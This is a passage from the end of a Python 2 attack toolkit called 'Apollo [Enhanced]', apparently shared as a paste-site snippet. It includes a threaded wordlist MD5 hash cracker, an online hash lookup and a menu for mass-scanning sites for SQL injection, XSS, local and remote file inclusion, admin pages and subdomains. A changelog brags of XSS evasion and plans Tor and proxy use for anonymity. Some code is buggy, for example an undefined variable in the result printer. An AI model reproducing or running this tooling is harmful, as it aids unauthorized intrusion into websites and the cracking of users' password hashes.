  756.  
  757.  
  758. class Cracker(threading.Thread):
  759. """Use a wordlist to try and brute the hash"""
  760. def __init__(self, queue, hashm):
  761. threading.Thread.__init__(self)
  762. self.queue = queue
  763. self.hashm = hashm
  764.  
  765. def run(self):
  766. """Hash word and check against hash"""
  767. while True:
  768. try:
  769. word = self.queue.get(False)
  770. except Queue.Empty:
  771. break
  772. tmp = hashlib.md5(word).hexdigest()
  773. if tmp == self.hashm:
  774. self.result(word)
  775. self.queue.task_done()
  776.  
  777. def result(self, words):
  778. """Print result if found"""
  779. print self.hashm + ' = '+Words
  780.  
  781. def word():
  782. """Create queue and threads for hash crack"""
  783. queue = Queue.Queue()
  784. wordlist = raw_input('Wordlist: ')
  785. hashm = raw_input('Enter MD5 hash: ')
  786. read = open(wordlist)
  787. for words in read:
  788. words = words.replace("\n","")
  789. queue.put(words)
  790. read.close()
  791. for i in range(5):
  792. thread = Cracker(queue, hashm)
  793. thread.setDaemon(True)
  794. thread.start()
  795. queue.join()
  796.  
  797.  
  798. class OnlineCrack:
  799. """Use online service to check for hash"""
  800.  
  801. def crack(self):
  802. """Connect and check hash"""
  803. hashm = raw_input('Enter MD5 Hash: ')
  804. conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm))
  805. conn.add_header('User-Agent', choice(USER_AGENT))
  806. opener = urllib2.build_opener()
  807. opener.open(conn)
  808. data = opener.open(conn).read()
  809. if data == 'No results returned.':
  810. print '\n-[!]- Not found!'
  811. if data == 'Cleartext of':
  812. print '\n-[!]- %s' % (data)
  813.  
  814.  
  815. class Check:
  816. """IP address Checker"""
  817.  
  818. def grab(self):
  819. """Connect to site and grab IP"""
  820. site = 'http://www.tracemyip.org/'
  821. try:
  822. conn = urllib2.Request(site)
  823. conn.add_header('User-Agent', choice(USER_AGENT))
  824. opener = urllib2.build_opener()
  825. opener.open(conn)
  826. data = opener.open(conn).read()
  827. start = 0
  828. end = len(data)
  829. start = data.find('onClick="', start, end)
  830. end = data.find('size=', start, end)
  831. ip_add = data[start+46:end-2].strip()
  832. print B+'\n-[!]- Your IP Address Is '+R+'%s' % (ip_add) +W
  833.  
  834.  
  835. except urllib2.HTTPError:
  836. print '-[!]- Error connecting'
  837.  
  838.  
  839. def output():
  840. """Outputs dork scan results to screen"""
  841. print '\n>> ' + str(vuln) + G+' Vulnerable Sites Found'+W
  842. print '>> ' + str(invuln) + G+' Sites Not Vulnerable'+W
  843. print '>> ' + str(np) + R+' Sites Without Parameters'+W
  844. if option == '1':
  845. print '>> Output Saved To sqli-result.txt\n'
  846. elif option == '2':
  847. print '>> Output Saved To lfi-result.txt'
  848. elif option == '3':
  849. print '>> Output Saved To xss-result.txt'
  850. elif option == '4':
  851. print '>> Output Saved To rfi-result.txt'
  852.  
  853.  
  854. W = "\033[0m";
  855. R = "\033[31m";
  856. G = "\033[32m";
  857. O = "\033[33m";
  858. B = "\033[34m";
  859.  
  860. def main():
  861. """Outputs Menu and gets input"""
  862. print (O+'''
  863. Apollo [Enhanced]
  864. by madhatter
  865.  
  866. Original by Sotd
  867. github.com/SotdCode/Apollo''')
  868. print (G+'''
  869. -[1]- SQL Injection
  870. -[2]- Cross Site Scripting
  871. -[3]- Local File Incursion
  872. -[4]- Remote File Incursion
  873. -[5]- Admin Page Finder
  874. -[6]- Sub Domain Finder
  875. -[7]- Dictionary MD5 cracker
  876. -[8]- Online MD5 cracker
  877. -[9]- IP Address Checker
  878. -[10]- See What Changed''')
  879. print W
  880. global option
  881. option = raw_input('-[!]- Enter Option: ')
  882.  
  883. if option:
  884. if option == '1':
  885. Crawl()
  886. output()
  887.  
  888. elif option == '2':
  889. Crawl()
  890. output()
  891.  
  892. elif option == '3':
  893. Crawl()
  894. output()
  895.  
  896. elif option == '4':
  897. Crawl()
  898. output()
  899.  
  900. elif option == '5':
  901. admin()
  902. aprint()
  903.  
  904. elif option == '6':
  905. subd()
  906.  
  907. elif option == '7':
  908. word()
  909.  
  910. elif option == '8':
  911. OnlineCrack().crack()
  912.  
  913. elif option == '9':
  914. Check().grab()
  915.  
  916. elif option == '10':
  917. print(O+'''\n--- Changes Made in Enhanced Apollo ---''')
  918. print(G+'''
  919. = Apollo now scan wider range of SQL DBs
  920. ---- MySQL [More errors]
  921. ---- MsSQL [More errors]
  922. ---- Oracle/JBDC
  923. ---- ODBC
  924. ---- OLEDB
  925. ---- JETDB
  926. ---- ADODB
  927. ---- ProgreSQL
  928. ---- Sybase
  929. = XSS added evasion
  930. = Removed paramiko, due to errors
  931. = Added Color UI
  932. = Added more admin pages''')
  933. print(O+'''\n--- Future Plans ---''')
  934. print(G+'''
  935. = Random User Agent [WIP]
  936. = TOR/Polipo [WIP]
  937. = SSH tunnelling (better than paramiko)
  938. = Online Proxy Grabber [WIP]
  939. = More detail on IP [WIP]
  940. = SQL Column Counter [WIP]
  941. = Persistent XSS finder
  942. = XSS finder with manual options
  943. = SQLi with manual options''')
  944. print(B+'''\n## Contact at [email protected] ##''')
  945. print W
  946.  
  947. else:
  948. print R+'\nInvalid Choice\n'+W
  949. time.sleep(0.5)
  950. main()
  951.  
  952. else:
  953. print R+'\nYou Must Enter An Option\n'+W
  954. time.sleep(0.5)
  955. main()
  956.  
  957. if __name__ == '__main__':
  958. main()
  959. elif conf.get("threads", 0) > 1:
  960. os._exit(0)

Report this snippet  

You need to login to post a comment.